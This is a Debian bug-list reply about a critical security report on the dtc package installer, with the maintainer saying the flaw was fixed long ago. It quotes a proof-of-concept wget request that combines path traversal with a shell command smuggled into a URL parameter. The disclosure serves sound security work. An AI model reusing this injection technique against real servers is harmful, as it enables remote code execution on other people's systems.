On 08/13/2011 05:00 PM, Ansgar Burchardt wrote: > Package: src:dtc > Version: 0.32.10-2 > Severity: critical > Tags: security upstream > > The package installer helpfully allows users to run shell code: > > wget -q -O- > 'http://localhost:8080/dtc/?adm_login=asd&adm_pass=asdf&action=do_install&pkg=../../../../../../../../../tmp&addrlink=asd.com/package-installer&dtcpkg_directory=$(touch > /tmp/more-owned)/tmp/foo&subdomain=www' > > Ansgar
I'm surprised to see both #637630 #637632, because they've been fixed a long time ago (the same file in the git has the necessary input checking). Thomas -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of "unsubscribe". Trouble? Contact listmas...@lists.debian.org
